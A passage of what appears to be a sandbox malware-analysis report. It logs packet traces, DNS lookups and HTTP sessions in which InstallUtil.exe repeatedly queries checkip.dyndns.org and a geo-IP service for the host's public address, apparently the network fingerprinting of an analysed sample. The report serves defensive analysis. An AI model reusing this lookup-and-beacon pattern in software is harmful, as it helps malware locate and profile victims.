                                                              Nov 11, 2024 05:17:07.948667049 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.949330091 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.949385881 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.949979067 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.950028896 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.950155020 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.950205088 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.950460911 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.950508118 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.950519085 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.950536966 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.950578928 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.953258038 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.975899935 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:09.220454931 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:09.225342035 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:09.225404024 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:09.225678921 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:09.230485916 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:09.892749071 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:09.896322966 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:09.901122093 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:10.105959892 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:10.142754078 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:10.142803907 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:10.142869949 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:10.147030115 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:10.147046089 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:10.149548054 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:10.573556900 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:10.573800087 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:10.584829092 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:10.584847927 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:10.585144043 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:10.636885881 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:10.943344116 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:10.987334013 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.044776917 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.044835091 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.052910089 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.074364901 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.157618046 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:11.162523985 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:11.367885113 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:11.370795965 CET49730443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.370836973 CET44349730188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.370904922 CET49730443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.371540070 CET49730443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.371555090 CET44349730188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.415201902 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:11.798888922 CET44349730188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.807611942 CET49730443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.807645082 CET44349730188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.910037994 CET44349730188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.910106897 CET44349730188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.910154104 CET49730443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.910593987 CET49730443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.950649977 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:11.952064037 CET4973180192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:11.955984116 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:11.956037045 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:11.956834078 CET8049731132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:11.956892967 CET4973180192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:11.957041025 CET4973180192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:11.961757898 CET8049731132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:12.614900112 CET8049731132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:12.636470079 CET49734443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:12.636501074 CET44349734188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:12.639029026 CET49734443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:12.639399052 CET49734443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:12.639414072 CET44349734188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:12.666976929 CET4973180192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:13.083976030 CET44349734188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:13.092484951 CET49734443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:13.092510939 CET44349734188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:13.504844904 CET44349734188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:13.504913092 CET44349734188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:13.505053997 CET49734443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:13.505486965 CET49734443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:13.509790897 CET4974080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:13.514657974 CET8049740132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:13.514749050 CET4974080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:13.514837027 CET4974080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:13.519546032 CET8049740132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:14.172065020 CET8049740132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:14.173099041 CET49746443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:14.173127890 CET44349746188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:14.173198938 CET49746443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:14.173407078 CET49746443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:14.173422098 CET44349746188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:14.212073088 CET4974080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:14.601675034 CET44349746188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:14.604697943 CET49746443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:14.604716063 CET44349746188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:14.709831953 CET44349746188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:14.709897041 CET44349746188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:14.710108995 CET49746443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:14.710349083 CET49746443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:14.713784933 CET4974080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:14.714637041 CET4975280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:14.718977928 CET8049740132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:14.719033957 CET4974080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:14.719422102 CET8049752132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:14.719629049 CET4975280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:14.719708920 CET4975280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:14.725233078 CET8049752132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:15.378827095 CET8049752132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:15.380247116 CET49758443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:15.380274057 CET44349758188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:15.380352020 CET49758443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:15.380588055 CET49758443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:15.380603075 CET44349758188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:15.430843115 CET4975280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:15.814749002 CET44349758188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:15.816293955 CET49758443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:15.816320896 CET44349758188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:15.949381113 CET44349758188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:15.949434042 CET44349758188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:15.949484110 CET49758443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:15.949817896 CET49758443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:15.953154087 CET4975280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:15.953708887 CET4976480192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:15.958220959 CET8049752132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:15.958314896 CET4975280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:15.958477974 CET8049764132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:15.958544970 CET4976480192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:15.958626032 CET4976480192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:15.963386059 CET8049764132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:16.616981983 CET8049764132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:16.618201971 CET49770443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:16.618227959 CET44349770188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:16.618288994 CET49770443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:16.618856907 CET49770443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:16.618870974 CET44349770188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:16.665205002 CET4976480192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:17.045336962 CET44349770188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:17.046969891 CET49770443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:17.046991110 CET44349770188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:17.151176929 CET44349770188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:17.151232004 CET44349770188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:17.151279926 CET49770443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:17.151669979 CET49770443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:17.154795885 CET4976480192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:17.156091928 CET4977680192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:17.160159111 CET8049764132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:17.160219908 CET4976480192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:17.160875082 CET8049776132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:17.160947084 CET4977680192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:17.161007881 CET4977680192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:17.165709972 CET8049776132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:17.818900108 CET8049776132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:17.823074102 CET49782443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:17.823102951 CET44349782188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:17.823174000 CET49782443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:17.823411942 CET49782443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:17.823426008 CET44349782188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:17.868925095 CET4977680192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:18.249470949 CET44349782188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:18.250874043 CET49782443192.168.2.5188.114.96.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 11, 2024 05:16:51.993442059 CET | 64801 | 53 | 192.168.2.5 | 1.1.1.1
Nov 11, 2024 05:16:52.367841005 CET | 53 | 64801 | 1.1.1.1 | 192.168.2.5
Nov 11, 2024 05:16:55.391479015 CET | 58923 | 53 | 192.168.2.5 | 1.1.1.1
Nov 11, 2024 05:16:55.398777962 CET | 53 | 58923 | 1.1.1.1 | 192.168.2.5
Nov 11, 2024 05:16:56.333863974 CET | 51295 | 53 | 192.168.2.5 | 1.1.1.1
Nov 11, 2024 05:16:56.340763092 CET | 53 | 51295 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 11, 2024 05:16:51.993442059 CET | 192.168.2.5 | 1.1.1.1 | 0x16e0 | Standard query (0) | www.oleonidas.gr | A (IP address) | IN (0x0001) | false
Nov 11, 2024 05:16:55.391479015 CET | 192.168.2.5 | 1.1.1.1 | 0xd207 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Nov 11, 2024 05:16:56.333863974 CET | 192.168.2.5 | 1.1.1.1 | 0x7f18 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 11, 2024 05:16:52.367841005 CET | 1.1.1.1 | 192.168.2.5 | 0x16e0 | No error (0) | www.oleonidas.gr | oleonidas.gr | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 05:16:52.367841005 CET | 1.1.1.1 | 192.168.2.5 | 0x16e0 | No error (0) | oleonidas.gr | | 185.78.221.73 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 05:16:55.398777962 CET | 1.1.1.1 | 192.168.2.5 | 0xd207 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 05:16:55.398777962 CET | 1.1.1.1 | 192.168.2.5 | 0xd207 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 05:16:55.398777962 CET | 1.1.1.1 | 192.168.2.5 | 0xd207 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 05:16:55.398777962 CET | 1.1.1.1 | 192.168.2.5 | 0xd207 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 05:16:55.398777962 CET | 1.1.1.1 | 192.168.2.5 | 0xd207 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 05:16:55.398777962 CET | 1.1.1.1 | 192.168.2.5 | 0xd207 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 05:16:56.340763092 CET | 1.1.1.1 | 192.168.2.5 | 0x7f18 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 05:16:56.340763092 CET | 1.1.1.1 | 192.168.2.5 | 0x7f18 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                              • www.oleonidas.gr
                                                              • reallyfreegeoip.org
                                                              • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 132.226.247.73 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 05:16:55.423974991 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 11, 2024 05:16:56.081047058 CET | 322 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 04:16:55 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 36d55b2059c9abc54fb4ee7b6b2afeba
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>
Nov 11, 2024 05:16:56.085685968 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 11, 2024 05:16:56.295783043 CET | 322 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 04:16:56 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: e0d8a0604c6c2711fa81fad3fb1c1d6a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>
Nov 11, 2024 05:16:57.673269987 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 11, 2024 05:16:57.882739067 CET | 322 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 04:16:57 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8c735f319079ab674bd690b96401c053
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 132.226.247.73 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 05:16:58.441224098 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 11, 2024 05:16:59.099508047 CET | 322 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 04:16:58 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 67f0415f023cd049f9802d77db4c4c25
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49710 | 132.226.247.73 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 05:17:00.660936117 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 11, 2024 05:17:01.318558931 CET | 322 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 04:17:01 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ced0ac6ade74e22668d90c430dcce6a2
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49712 | 132.226.247.73 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 05:17:01.858141899 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 11, 2024 05:17:02.517927885 CET | 322 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 04:17:02 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7019da6f632dba2780f1264fe8b3cad5
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49714 | 132.226.247.73 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 05:17:03.087774038 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 11, 2024 05:17:03.748186111 CET | 322 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 04:17:03 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b213283711a68380478abf377c57332f
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49716 | 132.226.247.73 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 05:17:04.297765017 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 11, 2024 05:17:04.956367970 CET | 322 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 04:17:04 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7694587ab6c22093b5c10161d3e6bc6e
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49718 | 132.226.247.73 | 80 | 1436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 05:17:05.570384979 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 11, 2024 05:17:06.228136063 CET | 322 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 04:17:06 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7ee49f1fe88f897a412ac71d458bfa14
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49722 | 132.226.247.73 | 80 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 05:17:09.225678921 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 11, 2024 05:17:09.892749071 CET | 322 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 04:17:09 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7d562d3df24c6b3f38e422bfab6b4e83
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>
Nov 11, 2024 05:17:09.896322966 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 11, 2024 05:17:10.105959892 CET | 322 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 04:17:09 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 0544c3005ef23f8af093995904efec25
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>
Nov 11, 2024 05:17:11.157618046 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 11, 2024 05:17:11.367885113 CET | 322 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 04:17:11 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 5f5a07b550ce3e9f7393e0585fba2d38
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49731 | 132.226.247.73 | 80 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 05:17:11.957041025 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Nov 11, 2024 05:17:12.614900112 CET | 322 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 04:17:12 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 44ec6786e25416d82661593feebbd697
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              9 | 192.168.2.5 | 49740 | 132.226.247.73 | 80 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 11, 2024 05:17:13.514837027 CET | 151 | OUT | GET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:17:14.172065020 CET | 322 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:14 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: fd11d340e318c7ae9d33c17de2640c4d
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 66.23.206.109</body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              10 | 192.168.2.5 | 49752 | 132.226.247.73 | 80 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 11, 2024 05:17:14.719708920 CET | 151 | OUT | GET / HTTP/1.1
